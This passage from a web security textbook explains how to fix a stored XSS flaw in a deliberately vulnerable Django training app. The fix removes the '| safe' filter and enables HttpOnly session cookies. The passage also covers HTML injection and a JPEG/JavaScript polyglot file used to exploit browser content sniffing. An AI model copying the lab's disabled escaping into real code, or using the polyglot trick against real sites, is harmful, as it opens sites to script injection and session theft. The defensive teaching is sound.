Each of the XSS examples relies on user-submitted code being interpreted at HTML. The best defense is to ensure that it isn’t—remove or escape any HTML special characters such as < and >, &, etc.

This is not as easy as it might first appear. Like escaping URL-encoded input, there are several common mistakes that hackers know and can exploit. The best strategy is to use a well-established third-party library to do the escaping. Django has one built in.

In fact, we had to deliberately disable Django’s HTML escaping as it is switched on by default. Take a look at the HTML template at
coffeeshopsite/coffeeshop/templates/coffeeshop/product.html
In the section underneath <h3>Comments</h3>, you will see the following line:
{{ comment.comment | safe }}

The braces {{ ... }} are Django’s syntax for variable substitution, so this is printing the comment of comment.comment.

By default, Django will escape this. We appended safe to indicate that we want Django to treat the variable as safe text and not to perform escaping. Variables with user input, as in this case, should definitely not be treated as safe, unless it has been escaped previously in back-end code.

There are additional defenses that specifically relate to session IDs (and CSRF cookies, which we will look at in the next chapter). Session IDs need special defenses because they contain sensitive information. As we saw in the last exercise, they perform the same function as a username and password and should therefore be treated as securely. The difference is they are designed to be disposable—we can invalidate a user session by deleting the server-side entry for that ID, and the only inconvenience is that the user will have to log in again.

We saw in Section 7.2 that we can place limitations on how a cookie is used when we send it to the client. The session-grabbing attack in the last exercise would have been prevented if we had set the HttpOnly parameter in the cookie. It would then be inaccessible to JavaScript. Other cookies would be sent to the attacker, but not the cookies created with HttpOnly.

And of course no cookies would be sent at all if we had escaped the HTML.

Django makes it particularly easy to change the settings for session ID cookies, using variables in settings.py. The key ones for security are given in Table 7-3.
Table 7-3

Django’s session cookie security variables

Variable

Meaning

Default

SESSION_COOKIE_AGE

Set the Max-Age parameter

1209600 (2 weeks)

SESSION_COOKIE_DOMAIN

Set the domain the cookie will be sent for

None

SESSION_COOKIE_HTTPONLY

Set the HttpOnly flag (don’t make the cookie available in JavaScript)

True

SESSION_COOKIE_PATH

Set the path the cookie will be sent for

/

SESSION_COOKIE_SAMESITE

Set the cookie’s SameSite value

Lax

SESSION_COOKIE_SECURE

Set the cookie’s Secure flag (only send over HTTPS)

False

Looking at this table, it is clear that by default, the session ID should not have been sent by the malicious JavaScript. It was because we have overridden SESSION_COOKIE_HTTPONLY in our settings.py.

Fixing The XSS Vulnerability
Firstly, delete the product comment we created in the previous exercise. Now, delete your session cookie from Chrome: select Settings from the three vertical dots menu at the top right of the browser, then select Privacy and security, then Cookies and other site data, then See all cookies and site data. Alternatively, enter the following in the address bar:
chrome://settings/siteData

Click on the delete icon next to 10.50.0.2. Visit or reload

http://10.50.0.2

We will fix the XSS vulnerability in the product comments using two methods:
  1. 1.

    Change the session cookie settings in settings.py.

     
  2. 2.

    Ensure that comment text is properly escaped in product.html.

     
For method 1, open settings.py and change the line
SESSION_COOKIE_HTTPONLY = False
to
SESSION_COOKIE_HTTPONLY = True

Restart Apache with sudo apachectl restart, log in as bob again, and create a new comment with the alert() to display the cookie (see the exercise “Exploiting a Stored XSS Vulnerability”) with the JavaScript code, reload and confirm the cookie is not displayed.

Note that the CSRF token cookie will still be displayed as this setting applies to the session ID cookie only.

Delete the cookie before proceeding to method 2. Open product.html in
coffeeshop/vagrant/coffeeshopsite/coffeeshop/templates/coffeeshop
and change
{{ comment.comment | safe }}
to
{{ comment.comment }}

Restart Apache again with sudo apachectl restart, recreate the comment, reload, and confirm the JavaScript is not executed.

The solution to this exercise is in coffeeshop/vagrant/snippets/xss.txt.

HTML Injection

Before leaving XSS, we should discuss the related vulnerability of HTML injection. This occurs when an attacker can get HTML code interpreted as part of a page. We include it here rather than in the section on injection as it arises from the same vulnerability. The difference between this and Stored XSS is that the injected text is HTML not JavaScript.

Even without JavaScript code, HTML injection can be harmful. An attacker can deface a site by adding images with IMG tags or entire pages with <iframe> tags. They can create links that can be used to track visitors or deliver malware.

Defending against HTML injection is the same as against XSS—sanitize user input.

7.8 Content Sniffing

We looked at potential vulnerabilities of file uploading in Chapter 5. Among the defenses, we said developers should confirm that the file type matches what is expected.

It is possible for a file to simultaneously be valid syntax for more than one file type. These are called polyglot files. They can potentially be useful to attackers because of a feature in browsers that causes them to change the content type from what was given in the server’s HTTP response.

Consider the following example. An attacker wants to upload malicious JavaScript to a site. The only opportunity to get code onto the server is an image upload form (e.g., on a social media site). Perhaps the site filters JavaScript uploads using Content Security Policy (CSP), which we will discuss in Chapter 8.

The attacker constructs a file containing the malicious JavaScript that is also a valid JPEG file, calling it myimage.jpg. They then upload it using the image upload form. The server checks the content and confirms it is a JPEG file.

Later, the attacker is able to have the JavaScript/JPEG file linked to with the following HTML:
<script src="myimage.jpg"></script>

Most web servers derive the Content-Type header from the file extension. When the client requests myimage.jpg, the server looks at the extension and sends the image with Content-Type: image/jpeg. The script should fail to execute.

However, many browsers try to be clever and assume the server has made an error. The browser is expecting application/javascript but receives image/jpeg. Believing the server may have sent the wrong content type, it inspects the file to check if it is actually JavaScript. As the image is both valid JPEG and JavaScript, the browser will decide it is actually a script and will execute it.

This is a somewhat esoteric vulnerability, but it can be demonstrated to be exploitable. Gareth Heyes at PortSwigger demonstrated that he can create a file that is simultaneously valid JPEG and JavaScript.4 We have extended this idea to create a script that can join (more or less) arbitrary JPEG images and JavaScript files into one file, which is valid syntax for both.

If you look at your coffeeshop Git clone, you will see a directory called other/jpgjs containing this script along with an example. The JPEG/JavaScript file is hackedimage.jpg. It is a valid image of a Swiss mountain. It is also JavaScript that displays a message in an alert window.

Take a look at the file index.html. It displays the image with a conventional <img> tag:
<img src="hackedimage.jpg">
It also runs it as a script with
<script charset="ISO-8859-1"  src="hackedimage.jpg"></script>

Open the index.html file in Firefox. The image will be displayed, and the alert will pop up. Both come from the same file. It works in older versions of Chrome though not in the most recent ones.

It is arguable whether this vulnerability has been exploited in real life. However, it is such an easy one to fix, and the browser feature seems so unnecessary, that it is worth fixing anyway. The solution is to add a header
X-Content-Type-Options: nosniff

which instructs the browser not to perform this content inspection. It can be added to all responses.

In Django, the nosniff header is enabled and disabled with the SECURE_CONTENT_TYPE_NOSNIFF variable in settings.py. It is set to True by default, adding the preceding header to all responses.

7.9 Summary

Code that handles user input is a common source of vulnerabilities in web applications. We saw that it gives attackers the opportunity to have their own code executed on the server or by victims’ browsers.

We looked at how cookies work and how to set their parameters safely, for example, by giving appropriate values to the SameSite parameter.

We examined user inputoriented vulnerabilities and how to secure code against them.

Injection attacks exploit vulnerable user inputhandling code. SQL injection attacks work by getting attacker’s SQL code executed on the database through unsanitized input fields. Command injection attacks are similar, but the attacker’s input is executed as shell commands on the server. Code injection attacks seek to get code executed, for example, Python. We saw that input sanitization is the best defense against injection.

Server-side request forgery is an attack where a hacker can embed their request inside an API and use it to execute commands behind the server’s firewall.

We also looked at a client-side attack: cross-site scripting. In these attackers, a hacker aims to get their JavaScript code executed in a victim’s browser. The best defenses are sanitizing user input and safe use of cookie settings such as the SameSite parameter.

We ended the chapter by looking at how browser’s content sniffing feature can be exploited.

In the next chapter, we look at cross-site requests: how to allow our server to access other sites without introducing vulnerabilities.

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset
44.200.27.215